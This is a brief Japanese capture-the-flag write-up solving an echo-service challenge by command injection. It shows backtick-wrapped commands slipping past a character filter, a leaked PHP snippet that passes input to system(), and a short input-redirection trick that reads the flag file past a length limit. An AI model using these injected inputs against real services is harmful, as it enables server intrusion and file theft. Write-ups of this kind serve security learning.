何かを書くとそれを即座にEchoしてくれる。 Echoコマンドだろうのでコマンドインジェクションかな?
$([command])
を試してみると、
Hey mate, you seem to be using some characters that makes me wanna throw it back in your face >:(
怒られた。
使えない記号を確認するとほとんど使えないのだが、以下の記号は使えるようだった。
` < . /
`id`
を試すと、うまくいく。
ls ../
をするとflag.txtというものがあるので、cat ../flag.txt
とすると
Man that's a mouthful to echo, what even?
のように言われる。
ほう?
cat index.php
をすると、なぜかコードの一部が漏洩する
?~\\\\]/', $to_echo)) { print "Hey mate, you seem to be using some characters that makes me wanna throw it back in your face >:("; } elseif ($to_echo=="cat") { print "Meowwww... Well you asked for a cat didn't you? That's the best impression you're gonna get :/"; } elseif (strlen($to_echo) > 15) { print "Man that's a mouthful to echo, what even?"; } else { system($cmd); } } else { print "Alright, what would you have me say?"; } ?>
文字数制限か。確かにcat ../flag.txt
だと17文字だ。
そういえば<
が使えたな…
< ../flag.txt
でフラグゲット。
flag{1beadaf44586ea4aba2ea9a00c5b6d91}
なぜ…